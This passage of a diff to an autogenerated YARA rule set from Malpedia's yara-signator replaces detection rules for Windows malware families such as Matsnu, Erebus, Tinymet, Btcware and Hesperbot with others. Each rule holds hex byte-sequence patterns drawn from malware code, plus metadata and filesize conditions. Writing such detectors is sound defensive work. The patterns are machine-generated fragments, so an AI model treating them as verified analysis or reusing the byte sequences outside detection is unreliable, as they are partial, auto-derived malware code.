+		$sequence_3 = { 488d8d16120000 0f1005???????? 898510120000 33d2 0fb705???????? 41b8f2010000 }
+		$sequence_4 = { 6666660f1f840000000000 803099 488d4004 4883e901 75f3 }
+		$sequence_5 = { 488d4510 c744242804000000 488d158fdb0100 41b904000000 4889442420 }
+		$sequence_6 = { 4533db 488d3d6b340000 4d85c9 488bc2 4c8be2 }
+		$sequence_7 = { 488b4d18 4c8d4520 488d158ee30100 ff15???????? 488b4d20 }
+		$sequence_8 = { 8b442430 8bc8 cd29 488d0d765e0100 e8???????? 488b442428 }
+		$sequence_9 = { 57 4883ec20 418bf0 4c8d0d2b320100 8bda 4c8d051a320100 488bf9 }
 
 	condition:
-		7 of them and filesize < 991232
+		7 of them and filesize < 808960
 }
-rule MALPEDIA_Win_Matsnu_Auto : FILE
+rule MALPEDIA_Win_Erebus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ac7d48b9-a967-5b74-8534-0fe3b275eb93"
+		id = "39f02208-f6d1-53ec-bb2d-e4d6d7fbb231"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.matsnu_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.erebus_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "5be086cc43b82632d1f6dd9c773840652ffd11fa9db4f5cb2927e6c0f81579b4"
+		logic_hash = "720efa579203a9c164159e94c36d17e968a866b84ffb4b18a083c36176a0a8d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146579,32 +146474,32 @@ rule MALPEDIA_Win_Matsnu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8985bcfbffff 83bdb0fbffff01 0f8588000000 8b85bcfbffff 8985c4fbffff 8b85c0fbffff }
-		$sequence_1 = { c645f700 c645f800 c645f90d c645fa0a c645fb00 }
-		$sequence_2 = { 750f c785a4fbffff02000000 e9???????? 8985bcfbffff 83bdb0fbffff01 }
-		$sequence_3 = { 8b75fa 01c6 8b4604 48 0145de ff45c6 }
-		$sequence_4 = { 0f8229010000 c745ea00000000 8b45e6 c1e004 8b75fa }
-		$sequence_5 = { 751d ff75ba ff7510 e8???????? 8945f6 }
-		$sequence_6 = { 884db8 807db800 7503 ff45be }
-		$sequence_7 = { c745f600000000 c745fa00000000 e8???????? 5b }
-		$sequence_8 = { 837d1800 7405 8b7d18 8907 b820000000 }
-		$sequence_9 = { 31c0 8985bcfbffff ffb5c4fbffff e8???????? 83f800 }
+		$sequence_0 = { 51 53 50 52 8bcf e8???????? 837d1c08 }
+		$sequence_1 = { 32db eb02 b301 57 e8???????? 83c404 c7442420ffffffff }
+		$sequence_2 = { 83c430 837dec10 720b ff75d8 e8???????? 83c404 837d1c10 }
+		$sequence_3 = { 55 57 8bf9 3bfa 7412 8d049d00000000 50 }
+		$sequence_4 = { 732f 8a80c4244f00 8d4da8 88857cfeffff ffb57cfeffff 6a01 e8???????? }
+		$sequence_5 = { 8d4e38 e8???????? 8d87e4000000 50 8d8ee4000000 e8???????? 5f }
+		$sequence_6 = { 8b542410 f30f6f40f0 83c708 8d4920 8d4020 660f380005???????? f30f7f41e0 }
+		$sequence_7 = { 83c40c 8b4610 89442444 8b542450 33c0 8b742454 8bca }
+		$sequence_8 = { 83f905 7d10 668b444b0c 6689044d0c775200 41 ebe8 8bce }
+		$sequence_9 = { bd20000000 83c6fc 2be9 03f2 8b16 8d76fc }
 
 	condition:
-		7 of them and filesize < 606992
+		7 of them and filesize < 2564096
 }
-rule MALPEDIA_Win_Tendyron_Dropper_Auto : FILE
+rule MALPEDIA_Win_Dratzarus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "08b15c69-b6bb-5f67-94b5-3ede90043914"
+		id = "f9302a79-cbbb-577e-b0de-afebe2c4bd13"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tendyron_dropper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tendyron_dropper_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dratzarus_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "94561d7c039213b2f4a4b8b35e59d5ff0543e6273d6a081dce691bd5357ae7eb"
+		logic_hash = "0edbbc2d6b5b6d721d8b3aacd843dcee1111d0fce65e6b309e3647e78f406b33"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146618,32 +146513,32 @@ rule MALPEDIA_Win_Tendyron_Dropper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6639430e 750f 6817070000 ff15???????? 33c0 }
-		$sequence_1 = { 81ec84000000 53 56 57 6a44 8bd8 }
-		$sequence_2 = { bf00200000 57 8945f0 e8???????? 59 6a00 57 }
-		$sequence_3 = { 85c0 7d0b 3b7d68 7501 }
-		$sequence_4 = { 56 33db 8d85b0feffff 53 50 e8???????? }
-		$sequence_5 = { 59 3bf3 0f84f3feffff 8b45fc 53 68d3000000 }
-		$sequence_6 = { 84c9 75f9 2bf2 8bce 8b75fc 33d2 f3a6 }
-		$sequence_7 = { 72ee 83f81e 77e9 833d????????00 }
-		$sequence_8 = { 68???????? c70614010000 ff15???????? 50 ff15???????? }
-		$sequence_9 = { 8a01 3429 0429 8801 41 4e }
+		$sequence_0 = { c7850002000016bc0b71 c78504020000128aa4ac c785080200000fa52ff4 c7850c020000421880f6 c7851002000023121336 }
+		$sequence_1 = { c7852802000014a20b6d c7852c02000012d8a499 c785300200000fa32ffa c78534020000420d80c7 c78538020000230a133f 66c7853c0200003e85 }
+		$sequence_2 = { 894511 66894515 8b05???????? 894517 0fb705???????? 6689451b }
+		$sequence_3 = { 6689440afe 6685c0 75ef 33c0 4883c9ff 488dbc2480060000 }
+		$sequence_4 = { 488d8de0000000 ba0f000000 488905???????? e8???????? 488bcb 488bd0 ff15???????? }
+		$sequence_5 = { bf01000000 488bcb ff15???????? 8bc7 488b8c2460020000 4833cc e8???????? }
+		$sequence_6 = { c74424306133dc18 c7442434679eb315 66c744243876d4 c785e0000000eb6cf5c3 }
+		$sequence_7 = { c7450c4b676e4a c745101d29ecd4 c745142daca8b6 c64518f2 c785800000005e7c6d4c c78584000000747e6447 c785880000003134f9ef }
+		$sequence_8 = { 89842454020000 e8???????? b902000000 8d5701 4533c0 }
+		$sequence_9 = { 488bd0 ff15???????? 488d8da0020000 ba14000000 488905???????? e8???????? 488bd0 }
 
 	condition:
-		7 of them and filesize < 58368
+		7 of them and filesize < 1606656
 }
-rule MALPEDIA_Win_Parasite_Http_Auto : FILE
+rule MALPEDIA_Win_Tinymet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "428f5b1a-bef9-53b1-98cc-8fc8771086ec"
+		id = "c4e92467-e964-5a19-9a8e-d27b4954cbf2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.parasite_http_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinymet_auto.yar#L1-L105"
 		license_url = "N/A"
-		logic_hash = "17acd197a87921b670f888ee97c4d2fb4638cc1589bba3924516c4ae4f9f894f"
+		logic_hash = "bbccdde23def456246dacbb5efe68ad5d612883065da6028a6a7729364ff21ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146657,32 +146552,30 @@ rule MALPEDIA_Win_Parasite_Http_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c602 43 3b5df4 72e6 8b7de4 eb07 8bcf }
-		$sequence_1 = { ff75f4 6aff ff15???????? 5f 5e 8bc3 5b }
-		$sequence_2 = { 8d95d4fdffff c785d4fdffff2c020000 8bce e8???????? e9???????? e8???????? 8b8ddcfdffff }
-		$sequence_3 = { 85c9 7405 e8???????? 5e 8bc3 5b 5f }
-		$sequence_4 = { ff7508 6801000040 57 53 ffd0 f7d8 5f }
-		$sequence_5 = { ff7510 6aff ff7508 6a00 68e9fd0000 ffd0 5e }
-		$sequence_6 = { ff55f0 8945e0 837de000 0f84eb000000 ff75ec 6a00 ff55e8 }
-		$sequence_7 = { e8???????? 8bd6 8bc8 e8???????? ff751c ff7518 }
-		$sequence_8 = { 6a00 6a00 681f000f00 57 ffd0 5f 5e }
-		$sequence_9 = { 8d8df8efffff 51 ffd0 5e 85c0 7917 b9???????? }
+		$sequence_0 = { e9???????? 8b400c ff750c 8b00 8b00 a3???????? }
+		$sequence_1 = { 7419 a1???????? 6a00 83c005 56 }
+		$sequence_2 = { 5e 5d c3 a1???????? 56 57 6a5c }
+		$sequence_3 = { 85c0 0f8545010000 ff7508 ff15???????? 85c0 750a 68???????? }
+		$sequence_4 = { 385d10 7416 6a04 8d45fc }
+		$sequence_5 = { 8d45f0 50 8d45e8 50 e8???????? 83c410 b80033a084 }
+		$sequence_6 = { a1???????? 59 50 ff35???????? }
+		$sequence_7 = { 33c0 57 668906 e8???????? a3???????? 8d4602 50 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Cherry_Picker_Auto : FILE
+rule MALPEDIA_Win_Carrotball_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a7caa2a0-b6b8-580c-adee-e174a6220843"
+		id = "93abea8a-2155-53fb-92a0-ba3485bf7552"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cherry_picker_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.carrotball_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "576fc4aca504b01489ce7bd7347bbe12054a63e779c96e3d35219ad0c56e8479"
+		logic_hash = "c456cd5c607eeb3fd6729b04660b73d440499731727e6676847cfbec1800428f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146696,32 +146589,32 @@ rule MALPEDIA_Win_Cherry_Picker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd3 68???????? 56 8944242c ffd3 68???????? }
-		$sequence_1 = { 8d442428 50 ff542420 8b442420 }
-		$sequence_2 = { 8bf0 8bd1 83c408 2bf2 8a11 88140e 41 }
-		$sequence_3 = { 68???????? 68???????? a3???????? ffd6 69c0e8030000 }
-		$sequence_4 = { ff15???????? a3???????? 85c0 7512 68???????? 50 }
-		$sequence_5 = { a3???????? ffd6 68???????? 6a3c }
-		$sequence_6 = { 8bf0 0fbec9 81e6ff000000 33f1 8a4a01 42 c1f808 }
-		$sequence_7 = { 68e8030000 68???????? 68???????? a3???????? }
-		$sequence_8 = { 68???????? 68e8030000 68???????? 68???????? a3???????? }
-		$sequence_9 = { 68???????? 56 8944242c ffd3 68???????? }
+		$sequence_0 = { 85c0 7451 6a00 68???????? ff15???????? }
+		$sequence_1 = { 6a20 6a00 68???????? 83f878 751f 68???????? }
+		$sequence_2 = { 6a00 6802000080 6a20 6a00 }
+		$sequence_3 = { 85c0 7432 8d85ecfdffff 50 ff15???????? }
+		$sequence_4 = { 68???????? ff15???????? eb36 68???????? 56 }
+		$sequence_5 = { 8d85f4fdffff 50 c785ecfdffff00000000 ff15???????? }
+		$sequence_6 = { 85c0 0f84f5000000 57 6a00 6a00 }
+		$sequence_7 = { 85c0 7451 6a00 68???????? ff15???????? eb36 }
+		$sequence_8 = { 0f84f5000000 57 6a00 6a00 }
+		$sequence_9 = { 6a04 58 6bc000 c7807430001002000000 6a04 58 6bc000 }
 
 	condition:
-		7 of them and filesize < 712704
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Lambload_Auto : FILE
+rule MALPEDIA_Win_Soundbite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ceafeacb-8aed-52b1-8cc4-bc13d9e4ebc5"
+		id = "55542a6a-ff29-54af-9f72-2267cf185584"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lambload_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.soundbite_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "bbe1c88e2fad81661a6dd79b8985da064315d8e7bbf36d0a65857b53079669fb"
+		logic_hash = "6e24536cd693eee2b46e8cd501f367ecabfbf15578ea8b1ce9e2cbd21490b0c3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146735,32 +146628,32 @@ rule MALPEDIA_Win_Lambload_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a02 8bf9 c785c0fbffff04010000 ff15???????? }
-		$sequence_1 = { f3a4 ffb5c4fbffff ff15???????? 8d7bfe }
-		$sequence_2 = { 0f8468ffffff 8d85f4fdffff 50 e8???????? }
-		$sequence_3 = { c70009000000 ebc5 8bc3 c1f805 8d3c8500490710 8bf3 83e61f }
-		$sequence_4 = { 8a00 88443dfc 8a5dfd 47 ff4508 }
-		$sequence_5 = { 33c9 3bc7 0f95c1 894604 8d41ff 8b4dfc 5f }
-		$sequence_6 = { 394510 7241 6a04 5b 7705 }
-		$sequence_7 = { 59 8945e0 85c0 7461 8d0cbd00490710 }
-		$sequence_8 = { 8bff 56 57 33ff ffb7602b0710 }
-		$sequence_9 = { 6685c9 75f4 8b4dfc 8bfb 8bf0 }
+		$sequence_0 = { 8dbd64fdffff 898590fdffff 889db7fdffff 899d64fdffff 899d68fdffff 899d6cfdffff }
+		$sequence_1 = { 51 8dbd64fdffff e8???????? c645fc02 8b13 8bb564fdffff 52 }
+		$sequence_2 = { 8d7c5702 4b ebea 3bf8 0f83b2000000 0fb707 }
+		$sequence_3 = { 0f849a010000 e8???????? 85c0 0f848d010000 8d85d8fcffff }
+		$sequence_4 = { c645fc04 8bbdf8fcffff 3bcb 0f83c9000000 8bd6 3bfa 0f87bf000000 }
+		$sequence_5 = { 898d54fdffff 898d58fdffff 8d8db7fdffff 40 51 8dbd50fdffff c685b7fdffff00 }
+		$sequence_6 = { 395de4 741d 8bc7 c1f805 83e71f c1e706 8b048500cf4200 }
+		$sequence_7 = { ff15???????? 8bf0 8d85a0fdffff e8???????? e9???????? 8bb5a8fdffff 8d85a0fdffff }
+		$sequence_8 = { 33049df02e4200 81e2ff000000 330495f03a4200 4f 0f85fcfdffff 83fe04 7250 }
+		$sequence_9 = { 85f6 0f85b3020000 50 e8???????? 83c404 8db578fdffff e8???????? }
 
 	condition:
-		7 of them and filesize < 1039360
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Deputydog_Auto : FILE
+rule MALPEDIA_Win_Appleseed_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cfca8e79-f926-56a2-8c99-b5468ee055dd"
+		id = "6233653f-8647-5513-96a5-b2cd884fdea1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deputydog_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.appleseed_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "ed5d5b1067c36186826e4424b2a432496a63ccbe3c2d0e290408a4c31dcb8d3d"
+		logic_hash = "142435c8e7521abcc92619a4e86e241d8250a7e1e464619e8d897ededc2c5423"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146774,32 +146667,32 @@ rule MALPEDIA_Win_Deputydog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c20c00 56 8bf1 6a04 ff74240c 8d4624 50 }
-		$sequence_1 = { ff15???????? 85c0 7424 8b45d8 8b55dc 6a14 }
-		$sequence_2 = { 8b7508 ff75f0 ff15???????? 57 6880000000 }
-		$sequence_3 = { 8b45f0 59 885dfc 59 8906 57 }
-		$sequence_4 = { c0e102 884dff eb35 83fa01 7511 8ac1 c0e804 }
-		$sequence_5 = { 6a14 59 e8???????? 8b55d4 6a14 8945e4 8b45d0 }
-		$sequence_6 = { 6a15 be???????? 59 bf???????? f3a5 8d8d74ffffff e8???????? }
-		$sequence_7 = { c645fc0a ff15???????? 8d8dccfeffff c645fc05 e8???????? 8d45cc }
-		$sequence_8 = { 2bc8 c1f905 394df0 0f83e2000000 03c7 56 50 }
-		$sequence_9 = { 8808 eb53 83ff01 7518 8a0e }
+		$sequence_0 = { 4989742410 41c6042400 49837f1810 7208 498b0f e8???????? 49c747180f000000 }
+		$sequence_1 = { 0f8414010000 488d15d2160200 488d4db8 e8???????? 90 488d55d8 488bc8 }
+		$sequence_2 = { 48894c2470 33f6 89742440 48c741180f000000 48897110 408831 4533c0 }
+		$sequence_3 = { 48837dd010 7209 488b4db8 e8???????? 48833d????????00 0f847c180000 48c745d00f000000 }
+		$sequence_4 = { 480f434daf 488b5d07 4c8bc3 4c8b75bf 4c3bf3 4d0f42c6 4d85c0 }
+		$sequence_5 = { 4889742440 4088742430 448d463c 488d1524b40100 488d4c2430 e8???????? 90 }
+		$sequence_6 = { 488b5c2438 4883c420 5e c3 488d0d887c0200 e8???????? }
+		$sequence_7 = { 48897310 c60300 48837d9810 7209 488b4d80 }
+		$sequence_8 = { e8???????? 488325????????00 4883c428 c3 488d05310a0200 c3 4053 }
+		$sequence_9 = { 488bfa 488bf1 4533f6 4489742460 44887580 33d2 41b8ff030000 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 497664
 }
-rule MALPEDIA_Win_Sierras_Auto : FILE
+rule MALPEDIA_Win_Ati_Agent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a99a7c2f-d459-55f5-a4a0-be6e81d58ab8"
+		id = "7923380a-3a79-5e9d-9e37-869ed5e218b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sierras_auto.yar#L1-L181"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ati_agent_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "b308bc717193dd71ac31a34af288e6c64991ecd536fc577f8480631d4b62be23"
+		logic_hash = "6ad1a7df4d93d69034a0d3b89b3f7bb98b02a7b32cfc4a510150a1520d075ff9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146813,38 +146706,32 @@ rule MALPEDIA_Win_Sierras_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8dbc24fc000000 83c9ff 33c0 f2ae }
-		$sequence_1 = { 83c408 8d94242c070000 52 ffd5 83f8ff 7516 8d84241c030000 }
-		$sequence_2 = { 8974243c 741a 56 57 e8???????? 83c660 83c408 }
-		$sequence_3 = { 817e601e010000 89465c 895df0 773e 837e641e 7738 }
-		$sequence_4 = { 017514 03fb 3b7d10 72b0 8b5df0 834dfcff 8d4de0 }
-		$sequence_5 = { f6461104 745f 83ff10 7321 837df800 0f84440d0000 8b45fc }
-		$sequence_6 = { ffd6 57 ffd6 8bc3 5b 5f 5e }
-		$sequence_7 = { ffd7 c745fcffffffff e8???????? 33c0 8b4df0 64890d00000000 }
-		$sequence_8 = { 897dfc 0f8cc0000000 837d0801 7e58 }
-		$sequence_9 = { 33c0 f2ae f7d1 49 0f8452030000 8d8c24fc000000 }
-		$sequence_10 = { 56 8bf1 57 68???????? 8d8608020000 50 ff15???????? }
-		$sequence_11 = { 8bc3 837d0800 50 8b450c 7511 8b4dec }
-		$sequence_12 = { 57 e8???????? 85c0 750d ff15???????? }
-		$sequence_13 = { c3 56 8bf1 e8???????? 8b8610010000 }
-		$sequence_14 = { 56 50 7507 e8???????? eb05 e8???????? 0175f0 }
-		$sequence_15 = { 837d0803 0f8fb0000000 397d10 897df0 0f86a4000000 8b7d14 8b450c }
+		$sequence_0 = { 4885c0 7404 f0440108 488d4158 41b806000000 488d1532cf0000 }
+		$sequence_1 = { c3 48895c2408 4889742410 57 4883ec70 8bf2 }
+		$sequence_2 = { 48895c2408 57 4883ec20 488d1d67870000 }
+		$sequence_3 = { 488d4158 41b806000000 488d1594c50000 483950f0 740b }
+		$sequence_4 = { 4883ec40 488b05???????? 4833c4 4889442438 498bf0 488bfa }
+		$sequence_5 = { 7d16 4863cf 8a84191d010000 42888401e0e80000 ffc7 ebde }
+		$sequence_6 = { 4c8bef 49c1fd05 4c8d3528e20000 83e31f 486bdb58 }
+		$sequence_7 = { e8???????? 4883c448 c3 4053 4883ec40 8bd9 }
+		$sequence_8 = { 48890d???????? c3 4883ec28 4c8bc1 }
+		$sequence_9 = { e8???????? b9ff000000 e8???????? 488bfb 4803ff 4c8d2df1790000 49837cfd0000 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Revc2_Auto : FILE
+rule MALPEDIA_Win_Btcware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a9d168dd-7c35-55c3-a239-5afaaa4e5d1b"
+		id = "fb79124d-5478-5d65-bb0b-b2f45f8507ae"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revc2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.revc2_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.btcware_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "940c1d8169d85582e91801f5b035bb96d22b7337aecd24f108d64e53de46b408"
+		logic_hash = "953afc4c0f32ce8172077704d80fd52c7aee0d584b7d86a36e176eb1e7df5fbe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146858,34 +146745,34 @@ rule MALPEDIA_Win_Revc2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4701 458bca 458bec 0f45f8 be01000000 8364244000 4183e21f }
-		$sequence_1 = { e8???????? 498946b0 488bc3 49894500 486307 4c6bf068 410fb6842434010000 }
-		$sequence_2 = { 90 488d8d90000000 e8???????? 90 488d4dd0 e8???????? 90 }
-		$sequence_3 = { ff15???????? e9???????? 488b0e 488b11 0fb74214 a804 0f84ab010000 }
-		$sequence_4 = { c5fe6f27 c5fe6f15???????? c5fe6f2d???????? c5fd71d404 c5fddbca c4e24d00d9 c5eddbc4 }
-		$sequence_5 = { eb12 4863c6 488d0c40 488b8388000000 488d04c8 895008 418d7701 }
-		$sequence_6 = { e8???????? 4c8b8424b8000000 498b38 4885ff 0f84fa010000 418bdd 4c8d0dca611200 }
-		$sequence_7 = { 4c894dc0 4889542450 4889442458 4c895c2440 895c2430 895c2470 895da0 }
-		$sequence_8 = { e8???????? 90 4c8bc0 488d4d50 e8???????? 488bf8 488d542450 }
-		$sequence_9 = { e8???????? 488bc3 488b5c2450 488b7c2458 4883c440 5d c3 }
+		$sequence_0 = { 8d85f4faffff 68???????? 50 ffd6 83c418 8d85f0faffff 50 }
+		$sequence_1 = { 8b4610 c6040800 83ff03 7ca9 8b7dd8 33db }
+		$sequence_2 = { e8???????? 8904bd40d04100 85c0 7514 }
+		$sequence_3 = { 6888d38101 68???????? 6a00 ffd3 33d2 }
+		$sequence_4 = { 50 ffb5a0d7ffff ff15???????? 85c0 0f8518feffff }
+		$sequence_5 = { 5d c3 55 8bec 83e4f8 b81c820000 }
+		$sequence_6 = { b880fd8101 c3 b87cfd8101 c3 53 56 }
+		$sequence_7 = { 897df4 3bfb 0f8e6fffffff 83c8ff eb07 8b04cdc42f4100 5f }
+		$sequence_8 = { c78564ffffff0f000000 c68550ffffff00 83f810 7245 8b8d38ffffff }
+		$sequence_9 = { 8945e0 8d8058c54100 8945e4 803800 8bc8 7435 8a4101 }
 
 	condition:
-		7 of them and filesize < 5108736
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Rm3_Auto : FILE
+rule MALPEDIA_Win_Hesperbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae32a8ae-4008-5a29-ba53-9431479c4978"
+		id = "e0f58539-e576-5f23-9601-3ac2130a34d6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rm3_auto.yar#L1-L393"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hesperbot_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "04a502f8c76326d2d2ff87950393542f221575ef954be32116492ddddf4bc28b"
+		logic_hash = "1227a34f1bfab44843a47045e0bfbe06efc158b222a90f56ca95eeb7d184b831"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -146897,62 +146784,32 @@ rule MALPEDIA_Win_Rm3_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b483c 03c8 0fb74106 8365f800 }
-		$sequence_1 = { 897104 8b4808 ff7004 034c240c 8b00 51 }
-		$sequence_2 = { 7303 8975f8 8b45f8 83c628 ff4dfc 85c0 7505 }
-		$sequence_3 = { 53 8945fc 0fb74114 56 57 8d740818 }
-		$sequence_4 = { 8b4508 3b460c 7247 8b7938 8b4608 8b513c }
-		$sequence_5 = { 56 57 8d740818 8b4508 3b460c 7247 }
-		$sequence_6 = { 8b460c 03c2 394508 7303 8975f8 8b45f8 }
-		$sequence_7 = { f7d2 23fa 3bf8 7609 8b413c 8d5418ff }
-		$sequence_8 = { 8bec 51 837d0804 53 56 6a57 }
-		$sequence_9 = { 8bf0 6a08 8d7e10 5a 8bc7 8d4df8 e8???????? }
-		$sequence_10 = { 56 57 8bd8 8bf9 8db5f0feffff 8bce 8d041b }
-		$sequence_11 = { 8bc6 e8???????? 56 ff7510 8d8df4feffff 51 ff7508 }
-		$sequence_12 = { 51 8365fc00 56 8d4508 50 6a08 }
-		$sequence_13 = { e8???????? ff7518 8d8578ffffff 50 50 8bc8 e8???????? }
-		$sequence_14 = { 8d856cfeffff ff750c 8d8de8fdffff 50 e8???????? ff7518 }
-		$sequence_15 = { 8bc6 e8???????? 6a58 6a00 56 e8???????? 83c40c }
-		$sequence_16 = { 4883ec30 488b05???????? 4c8ba42480000000 498bf1 4c8b90b0000000 }
-		$sequence_17 = { 4833d0 488bc2 48c1e81b 4833d0 488bc2 480fafc3 488901 }
-		$sequence_18 = { 4883ec50 418bf0 4c8b05???????? 498bf9 4d8b80c8000000 488bea 4c8d48d8 }
-		$sequence_19 = { 4c8d443b80 488d48b8 488d5098 e8???????? 85c0 0f84f0000000 8b4c2470 }
